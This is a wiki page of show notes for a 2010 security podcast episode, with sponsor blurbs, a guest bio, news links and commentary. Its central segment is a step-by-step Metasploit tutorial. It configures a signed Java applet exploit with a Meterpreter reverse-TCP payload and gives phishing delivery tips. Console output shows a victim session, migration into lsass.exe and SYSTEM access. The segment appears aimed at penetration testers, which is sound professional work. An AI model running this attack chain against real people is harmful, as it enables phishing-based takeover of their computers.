Episode185

From Paul's Security Weekly
Revision as of 14:35, 29 January 2010 by Darkoperator (Talk | contribs)

Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Shameless Plugs & General Announcements

PaulDotCom Security Weekly - Episode 185 - For Thursday January 28th, 2010

  • Shmoocon - This will be the next big conference that we will all be attending. We will have t-shirts and other special things to give away and sell. No, we are not selling the interns (who will both be there, btw). So come find us at the booth for all things PaulDotCom including free stickers, and PaulDotCom complete works DVDs!

Guest Interview: David Maman, CTO of GreenSQL

INFO

David Maman is a self described Entrepreneur and Technology Junkie who has founded of a number of high-tech start-up companies, including GreenSQL, GreenCloud, Vanadium-Soft, TrioGreen, Preacos, and Moksai. David was a senior technologist for Fortinet and also the chief scientist at Ofek.


GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc). GreenSQL provides MySQL database security solution. GreenSQL is distributed under the GPL license.

Questions

  1. How did you get your start in information security?

Metasploit Java Signed Applet Exploit

Yesterday Nathan Keltner from the Metasploit project committed to the project some new Java mixin code for performing attacks, included in the code is the first module to use the mixing, this module is the java signed applet creator, this module creates a signed Java jar with the parameters and payload of our choosing and creates a listening server to server as our attack host. To use this payload the ruby gem rjb and the Sun Java JDK must be install and configured on the box. Let me show you how to do it for a Backtrack 4. First we must install the java JDK for this we run the following command:

apt-get install sun-java6-jdk

once it is installed we configure our JAVA_HOME environment variable and make sure that it is present for all bash users on the system making sure that if we need to run Metasploit as root the variable will be present for us when we run the module.

echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME

Now that we have the environment variable all set we proceed to install the rjb gem by issuing the following command:

gem install rjb

Next we make sure we have the latest development version of the framework by moving to the framework folder and updating thru svn

cd /pentes/exploits/framework3
svn up

Now we launch msfconsole and proceed to configure the module for our attack:

./msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 495 exploits - 234 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8284 updated today (2010.01.28)

msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > info

       Name: Signed Applet Social Engineering Code Exec
    Version: 8281
   Platform: Windows, OSX, Linux, Solaris
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  natron <natron@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Mac OS X PPC (Native Payload)
  3   Mac OS X x86 (Native Payload)
  4   Linux x86 (Native Payload)

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  APPLETNAME   SiteLoader       yes       The main applet's class name.
  CERTCN       Metasploit Inc.  yes       The CN= value for the certificate.
  PAYLOADNAME  SiteSupport      yes       The payload classes name.
  SRVHOST      0.0.0.0          yes       The local host to listen on.
  SRVPORT      8080             yes       The local port to listen on.
  SSL          false            no        Negotiate SSL for incoming connections
  SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                       no        The URI to use for this exploit (default is random)

Payload information:
  Space: 0
  Avoid: 0 characters

Description:
  This exploit dynamically creates an applet via the
  Msf::Exploit::Java mixin, converts it to a .jar file, then signs the
  .jar with a dynamically created certificate containing values of
  your choosing. This is presented to the end user via a web page with
  an applet tag, loading the signed applet. The user's JVM pops a
  dialog asking if they trust the signed applet and displays the
  values chosen. Once the user clicks 'accept', the applet executes
  with full user permissions. The java payload used in this exploit is
  derived from Stephen Fewer's and HDM's payload created for the
  CVE-2008-5353 java deserialization exploit. This module requires the
  rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If
  these dependencies are not present, the exploit falls back to a
  static, signed JAR.

References:
  http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

msf exploit(java_signed_applet) >

Now that we have the module loaded we set the target for a Windows System:

msf exploit(java_signed_applet) > set TARGET 1
TARGET => 1

Now we setup the payload and configure its options:

msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST 192.168.1.100
LHOST => 192.168.1.100

The module by default creates a random URI Path I recommend changing the name depending on the type of phishing attack being performed:

msf exploit(java_signed_applet) > set URIPATH java
URIPATH => java
msf exploit(java_signed_applet) > set SRVPORT 80
SRVPORT => 80

Now we launch the exploit and we send the link to our target, I recommend using a shortening service:

msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:80/java
[*]  Local IP: http://192.168.1.210:80/java
[*] Server started.

Wen a target connects to the server we will see the module create the jar file and sign it and send the jar file to the target computer:

[*] Handling request from 192.168.1.208:1247...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
Adding SiteLoader.class
Adding SiteLoader$SiteSupport.class
Adding SiteLoader$SiteSupport$StreamConnector.class
Adding completed OK
[*] Jar built.  Signing...

Warning:
The signer certificate will expire within six months.
[*] Jar signed.  Ready to send.
[*] Sending SiteLoader.jar to 192.168.1.208:1248...
[*] Sending SiteLoader.jar to 192.168.1.208:1248...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.210:4444 -> 192.168.1.208:1249)

Now that we have a session and we can interact with it:

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run migrate
[*] Current server process: 0.6658820547377166.exe (2936)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 672
[*] New server process: lsass.exe (672)
meterpreter > sysinfo
Computer: WINXP-SP2-VM
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > getuis
[-] Unknown command: getuis.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

I do recommend that some homework must be done before hand since that target machine must have the JRE environment installed and configured for their browser before hand, when enumerating a target network and company things to look for are Oracle Application Servers, Tomcat Server and others Java Applications servers since the likelihood of the JRE being installed on client machines is higher, also if we are able to intercept client traffic thru Wireless or thru a public network and we see the Java trying to make an update is another good indication that it might be configured with the browser.

Stories For Discussion

  1. China pwns Oil Industry - [Mick] - This is an amazing long form article that covers energy markets, espionage, and future trends. I wish all reporting were this good!
  2. Not China? - [Mick] - Now it looks like the Aurora attack might not be China after all? Sigh... we need a better way to trace the source of attack!
  3. Digital DNA? - [Mick] - The forensics geek in me wants this to be true... but somehow I think this is a LONG way off. Keep working on this though DARPA boffins! This would be great to have.
  4. Attacking friends to get to targets - [Mick] - Oh hell yeah! Put the Social into your attack and get ready for all kinds of win. BTW: Bob approves of this very much.
  5. Jailed ID Theif commits ID theft while in Prison - [Mick] - I think this might be fail of the month here folks. If you go to jail for doing something bad, typically it means you are too dumb and got caught. So to keep doing the same thing... well that's a special kind of stupid.
  6. Say hello to Elenore! - [Mick] - Here's a great intro to browser exploit packs. Check it out! You'll be glad you did.
  7. No IP? No JavaScript? No cookie? No problem! - [Mick] - Wow I find this really neat! I like the idea from a forensics standpoint. Consider helping out by joining or just donating to the EFF.
  8. .EDU getting owned for SEO - [Larry] - Wjhile certainly not new, there appears to be a rise in the activity. Paul, I'd love to hear your comments about he open nature of the .EDU market and getting owned.
  9. Detailed recon - [Larry] - It is appearing that the attacks agains Google (and maybe others) involved some very detailed recon against several targets. This is the think that I've been mentioning for some time. Use all available methods for determining information about an organization, because, well, the attackers are doing it too. It becomes even more relevant when the attackers has have all of the time in the world for a long con.
  10. Mmmm, ZigBee - [Larry] - So, Travis Goodspeed finds some issues in PRNG with the TI Z-Stack. He submits the bug report, and TI fixes it in an update in firmware. Of course who update their firmware. What scares me most is a quote form Travis: "Electric utilities with equipment using the MSP430 or Chipcon CC2530 should contact their vendors for such updates. Unlike Windows and Linux, there's no easy way to perform an upgrade of a fragment of micro-controller firmware to which you haven't got the source." Ouch.
  11. Aircraft passenger networks - [Larry] - Now that this is moving further down the slide to inevitability, the FAA admits that is does not have regulations on how to deal with passenger computer networks. One person associated with the design claims that there is "some crossover". Now, connect that passenger network ti the internets, and in my opinion a firewall doesn't cut it.
  12. Awesome Usage of TOR - [PaulDotCom] - Our good friends over at www.i-hacked.com noticed that if they investigated an attack against them, the attackers would change IP addresses. Who'd thunk that the attackers would be checking their logs! Goes along with my thoery that most attackers are better at IT and IT security than some of us good guys. The site then walks you through setting up your own Tor proxy for everyone to use, to evade detection by the bad guys. N-I-C-E, high five to i-hacked!
  13. Stories From The Trenches - [PaulDotCom] - I love these, they are raw and unfiltered. Stories that you hear when you are out drinking at a security conference. Stories rule. I wish more people would share stories rather than the useless dribble that fills much of the "blogesphere" every week in information security (If I see one more post of "oh, this new version of the tool was released" without any further information, please shoot me). In any case, story #1 goes like this, man uses laptop, man lets girlfriend use laptop, laptop no worky, turns out girlfriend works for competition. Ouch. Story #2 is a life tip, when refering to a "reach around" do not hit "Reply-To All" an CC your entire company. You will have some explaining to do. On the plus side, you might make new friends.
  14. Passwords Suck - But Wireless Is Better? - [PaulDotCom] - This article does a great job of concisely explaining why passwords, and how we curently deal with them, suck. He offers a vendor solution that requires a USB dongle to be attached to the computer, and an RF transmitter attached to the person who needs to authenticate. No typing required. Reminds me of Star Trek, are they on to something with solving our password problems? Its much hard to attack remotely if the user account truly has no other means of authenticatin other than the token. But how secure is the token system?
  15. Hacker Puts Porn On Billboard - [PaulDotCom] - I just think this is great and is my top story of the week. Imagine driving down the highway and see porn on the billboard! It caused some traffic jams! Denial of service attack? Didn't look like there was any denying of service going on in the movie :)
  16. XSS, SQL Injection, and Fuzzing Bard Codes - [PaulDotCom] - Ask and you shall receive. Irongeek has put together some sample barcodes that can be scanned and will send attack strings. I <3 Irongeek.
  17. Is the lack of iPad Flash support for security? - [PaulDotCom] - NOT! First, if it would make Apple more money they would put flash on it even if it had 12,345 0day exploits (Apple fan boys don't care about security, remember, they run Macs, no viruses). Second, Apple's products most likely have more holes than Adobe Flash, but we don't hear about them because if you want to build a botnet to profit you target Windows, where everyone has flash because dogs that sing are entertaining. Third, Apple has quicktime, so who needs Flash? Fourth, Flash sucks processor and battery life. Fifth, Who cares anyway? The only sites that use Flash are youtube (which has an app) and every resturant and MySpace page on the planet. At some point we have to question WHY we are allowing these technologies to be used, rather than just letting our users do whatever the hell they want. Okay, I'm on a different rant now. In any case, I also have to say that writing an application in Flash, like Nessus, is totally cool and we should not continue to knock technology because it has bugs, because all technology has bugs. That being said, I run Flashblocker so how's that for a mind bender! (yes, I allow my Nessus servers to load Flash applications, and yes once the API is released we will have a Nessus flash iphone/ipad application).

Other Stories Of Interest

  • Job opening down South - [Mick] - No, further south than that... Need a hint? I hear you like penguins.  ;-)
  • "Perfect SPAM protection" - [Mick] - Look, I want this to be true, but i just know it's only a matter of time before someone comes up with a better way to pitch genuine replica watches.
  • Battling Cybercrime interview on NPR - [Mick] - I *loved* this interview, it's the most gentle and clear way I've ever heard anyone talk about botnets. My parents heard this interview and had an "Oh this is what Mick does as a job" moment. For nothing else, listen just to learn how to explain deep geek to folks who barely use computers.